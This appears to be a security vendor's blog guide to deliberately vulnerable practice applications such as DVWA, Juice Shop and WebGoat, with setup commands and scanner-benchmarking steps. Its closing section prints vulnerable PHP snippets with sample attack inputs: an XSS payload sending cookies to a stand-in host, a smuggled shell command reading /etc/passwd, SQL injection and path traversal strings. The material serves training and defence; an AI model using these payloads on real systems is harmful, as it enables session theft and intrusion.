Deliberately vulnerable web applications are the standard practice environment for web application security testing. Whether you’re a developer learning how injection attacks work, a security engineer benchmarking a SAST or DAST scanner, or a student preparing for a certification, vulnerable web applications provide a legal, isolated, resettable environment to practice offensive and defensive security techniques.
This guide covers every major vulnerable web application available for security testing in 2026 — what each one covers, who it’s for, and how to run it.
What Are Vulnerable Web Applications for Security Testing?
A vulnerable web application is a web application deliberately built with security flaws — SQL injection, XSS, command injection, path traversal, broken authentication, and other weaknesses from the OWASP Top 10 and beyond — so that security professionals and developers can practice finding and exploiting them legally.
Unlike real-world targets, these applications are:
- Legal to attack — they exist specifically to be probed
- Isolated — typically a Docker container running on your local machine or a private VM
- Resettable — restart the container to restore the original vulnerable state
- Educational — most include documentation explaining why each vulnerability exists and how to fix it
They serve three main use cases:
- Developer training — understanding how vulnerabilities work from an attacker’s perspective
- Security tool benchmarking — testing whether your SAST or DAST scanner detects known vulnerabilities before applying it to production code
- Certification practice — preparing for OSCP, CEH, eWPT, and other hands-on security certifications
The Complete List of Vulnerable Web Applications
DVWA — Damn Vulnerable Web Application
Language: PHP/MySQL
Best for: OWASP Top 10 fundamentals, PHP SAST benchmarking, beginners
DVWA is the most widely used deliberately vulnerable web application. Built in PHP with a MySQL backend, each vulnerability page comes in three difficulty levels (Low, Medium, High) with a code viewer showing exactly what makes the code vulnerable.
Vulnerabilities covered:
- SQL Injection (including blind injection — boolean-based and time-based)
- Command Injection
- Cross-Site Scripting (Reflected and Stored)
- CSRF
- File Upload (unrestricted)
- Local and Remote File Inclusion (LFI/RFI)
- Brute Force
- Insecure CAPTCHA
- Weak Session IDs
docker run --rm -it -p 80:80 vulnerables/web-dvwa
# Open http://localhost/
# Credentials: admin / password
# Click "Create / Reset Database" before first login
Why DVWA matters for scanner testing: The Low difficulty level presents vulnerabilities with zero obfuscation — SQL injection in a raw $_GET parameter concatenated directly into a query. If your SAST scanner can’t find this, it won’t find more subtle patterns in production code. Medium and High difficulty levels test whether the scanner handles basic evasion techniques.
OWASP Juice Shop
Language: Node.js/Express + Angular
Best for: Realistic DAST testing, modern web app architecture, CTF-style challenges
Juice Shop is the most realistic vulnerable web application available — a modern single-page application that looks and behaves like a real e-commerce store. It has 100+ security challenges organized by difficulty, with a built-in scoreboard and hint system.
Vulnerabilities covered:
- Injection (SQL, NoSQL, LDAP, log injection)
- Broken Authentication and Session Management
- Sensitive Data Exposure
- XML External Entities (XXE)
- Broken Access Control
- Security Misconfiguration
- XSS (Reflected, Stored, DOM-based)
- Insecure Deserialization
- JWT manipulation
- OAuth flaws
- Business logic vulnerabilities
docker run --rm -p 3000:3000 bkimminich/juice-shop
# Open http://localhost:3000/
# No initial login required — register to participate in challenges
# Visit /#/score-board to see all available challenges
Why Juice Shop matters for DAST testing: Juice Shop’s realistic architecture — authenticated endpoints, session management, REST API, file upload, admin interface — provides the most representative surface for DAST scanner testing among all open-source vulnerable applications.
WebGoat
Language: Java/Spring
Best for: Java developer training, Java SAST benchmarking, structured learning
WebGoat is OWASP’s Java-based security training platform. Each lesson explains a vulnerability category, walks through the attack, and requires the student to successfully exploit it before advancing. It’s more structured than DVWA.
Vulnerabilities covered:
- SQL Injection (including order-by injection)
- XSS
- Insecure Deserialization (Java ObjectInputStream)
- JWT attacks
- Path Traversal
- XXE
- SSRF
- Access Control failures
- Cryptographic failures
docker run -it -p 8080:8080 -p 9090:9090 webgoat/webgoat
# Open http://localhost:8080/WebGoat
# Register a new account to start
Why WebGoat matters for Java SAST: WebGoat’s Spring-based source code contains the same vulnerability patterns found in enterprise Java applications — perfect for verifying that a SAST tool handles Spring MVC data binding, JDBC templates, and ORM-level injection correctly.
bWAPP — Buggy Web Application
Language: PHP
Best for: Maximum vulnerability breadth, advanced practitioners
bWAPP covers 100+ vulnerability types — more than any other single vulnerable application. It includes vulnerability classes beyond the OWASP Top 10 that most other apps don’t cover.
Coverage beyond OWASP Top 10:
- SSRF (Server-Side Request Forgery)
- XML injection and XXE
- LDAP injection
- SMTP injection
- HTML5 security issues (localStorage, WebSocket attacks)
- Heartbleed (simulated)
- Shellshock (simulated)
- iFrame injection
- Client-side validation bypass
docker run -d -p 80:80 raesene/bwapp
# Open http://localhost/bWAPP/install.php
# Then http://localhost/bWAPP/login.php
# Credentials: bee / bug
NodeGoat
Language: Node.js/Express + MongoDB
Best for: Node.js SAST benchmarking, JavaScript-specific vulnerabilities
NodeGoat is OWASP’s deliberately vulnerable Node.js application. Unlike Juice Shop, it uses standard Express.js patterns — closer to what a typical Node.js backend API looks like in production.
Node.js/JavaScript-specific vulnerabilities:
- NoSQL injection (MongoDB query operator injection)
- Server-Side JavaScript injection (eval() misuse)
- Prototype pollution
- Insecure Express session configuration
- Dependency vulnerabilities (intentionally outdated npm packages)
- Missing HTTP security headers
git clone https://github.com/OWASP/NodeGoat
cd NodeGoat && npm install
docker-compose up
# Open http://localhost:4000/
# Default: admin / Admin_123
WebScarab NG / AltoroJ
Language: Java/JSP
Best for: Banking application simulation, enterprise DAST benchmarking
AltoroJ (also known as Altoro Mutual) is a vulnerable Java/JSP banking application used by IBM for security tool testing. Its banking context — account transfers, transaction history, user management — provides a more realistic business application surface than simple tutorial apps.
git clone https://github.com/AppSecDev/AltoroMutual
cd AltoroMutual && mvn package
java -jar target/altoromutual.war
# Open http://localhost:8080/
# Credentials: admin / admin
OWASP Mutillidae II
Language: PHP
Best for: OWASP Top 10 coverage, intermediate learners
Mutillidae II is a deliberately vulnerable PHP web application with over 40 vulnerability categories organized by the OWASP Top 10. It’s an alternative to DVWA with slightly more coverage of web services and REST API security.
docker run -d -p 80:80 -p 3306:3306 webpwnized/mutillidae
# Open http://localhost/
HackTheBox Web Challenges
Best for: Advanced practitioners, real-world vulnerability patterns, competitive training
HackTheBox offers a library of web application security challenges representing real CVE-style vulnerabilities in real frameworks — template injection, deserialization, race conditions, and chained attack scenarios.
Why it’s different from local vulnerable apps: HackTheBox challenges represent vulnerabilities found in actual production software — not toy examples. When you can consistently solve Medium and Hard HTB web challenges, you’re detecting the same vulnerability classes that appear in real security assessments.
PortSwigger Web Security Academy
Best for: Structured learning, free and browser-based, complete beginners to advanced
PortSwigger Web Security Academy is the most comprehensive free web security training platform. Labs run in the browser — no local setup required.
Advantages:
- 200+ labs across all OWASP categories
- Step-by-step explanations accompanying every lab
- Covers advanced topics: HTTP smuggling, prototype pollution, GraphQL injection, web cache poisoning
- Completely free — no subscription required
Limitation: Labs are browser-based and can’t be used for local SAST/DAST scanner benchmarking.
Choosing the Right Vulnerable Application for Your Goal
| Goal | Best Application |
|---|---|
| Complete beginner | DVWA (Low difficulty) |
| PHP SAST benchmarking | DVWA |
| Java SAST benchmarking | WebGoat |
| Node.js SAST benchmarking | NodeGoat |
| Realistic DAST testing | OWASP Juice Shop |
| Enterprise DAST benchmarking | AltoroJ |
| Maximum vulnerability breadth | bWAPP |
| Modern attack patterns (SSTI, deserialization) | HackTheBox |
| Free browser-based learning | PortSwigger Web Security Academy |
| Full attack chain practice (OSCP prep) | VulnHub VMs |
| CTF challenges with scoreboard | OWASP Juice Shop |
For most security teams, the right answer is running two or three of these simultaneously:
- DVWA or Juice Shop for DAST scanner benchmarking
- WebGoat or NodeGoat for language-matched SAST benchmarking
- PortSwigger Academy for structured learning without local infrastructure
How to Use Vulnerable Web Applications to Test Your Security Scanner
Before deploying a SAST or DAST tool on your production codebase, benchmark it against a known-vulnerable application first. This tells you what the tool actually finds versus what it claims to find.
SAST Benchmarking Procedure
- Clone the source code of DVWA, WebGoat, or NodeGoat from GitHub
- Point your SAST scanner at the source code directory
- Verify it flags the known-vulnerable functions:
- SQL injection in DVWA’s
vulnerabilities/sqli/source/low.php - Command injection in DVWA’s
vulnerabilities/exec/source/low.php - XSS in DVWA’s
vulnerabilities/xss_r/source/low.php
- SQL injection in DVWA’s
- Check whether the scanner also catches Medium and High difficulty levels (slightly obfuscated patterns)
- Measure false positives — does it flag the High-difficulty pages that use safe parameterized queries?
A scanner that misses obvious SQL injection in low.php will miss similar patterns in your production code.
DAST Benchmarking Procedure
- Run Juice Shop or DVWA in Docker locally
- Configure your DAST scanner with authentication credentials for the application
- Run a full authenticated scan
- Verify the scanner finds XSS, SQLi, and access control issues
- Check false positive rate on known-clean endpoints
Most Common Vulnerabilities Found in Real Applications
The vulnerability classes in these practice applications match exactly what’s found in production enterprise code:
SQL Injection (CWE-89)
// DVWA low.php — completely unobfuscated SQL injection
$id = $_GET['id'];
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
// Input: 1' OR '1'='1 returns all users
Cross-Site Scripting (CWE-79)
// Reflected XSS — user input rendered without encoding
echo "<pre>Hello " . $_GET['name'] . "</pre>";
// Input: <script>document.location='https://evil.io?c='+document.cookie</script>
Command Injection (CWE-78)
// Command injection — user input in a shell command
$target = $_REQUEST['ip'];
$cmd = shell_exec('ping -c 4 ' . $target);
// Input: 127.0.0.1; cat /etc/passwd
Path Traversal (CWE-22)
// Path traversal — user controls the filename
$file = $_GET['page'];
include('/var/www/html/dvwa/vulnerabilities/fi/' . $file);
// Input: ../../../../etc/passwd
Frequently Asked Questions
Is it legal to attack vulnerable web applications?
Yes — provided you run them in your own isolated environment (a local Docker container or private VM). These applications are explicitly built to be attacked. Never probe a vulnerable application running on a shared or public server without explicit authorization from the server owner.
Which vulnerable web application is best for a complete beginner?
Start with DVWA at Low difficulty. Its source code viewer shows exactly what makes each page vulnerable. Work through all categories at Low, then Medium, before moving to Juice Shop for a more realistic challenge.
Can I use these apps to practice for the OSCP exam?
Vulnerable web applications are useful supplementary OSCP practice for web exploitation modules. OSCP focuses primarily on network exploitation, privilege escalation, and Active Directory. For dedicated web security certifications (eWPT, GWAPT, Web+), PortSwigger Web Security Academy and HackTheBox web challenges are more targeted preparation.
Do I need a powerful computer to run these applications?
Most Docker-based vulnerable applications run comfortably on any machine with 4 GB of RAM. Juice Shop uses the most resources (Node.js SPA with a full backend). DVWA and bWAPP are very lightweight. AltoroJ requires a JVM but no significant compute.
Benchmark Your Scanner Against Known Vulnerabilities
Offensive360 SAST and DAST are benchmarked against DVWA, Juice Shop, and WebGoat on every release. Want to see how your current scanner compares — or how Offensive360 performs on your own codebase?
- One-time SAST scan for $500 — submit your source code, get a full vulnerability report within 48 hours, no subscription required
- DAST scan for your running application — authenticated scanning of your live web app
- Book a demo — see a live scan against a deliberately vulnerable application or your own codebase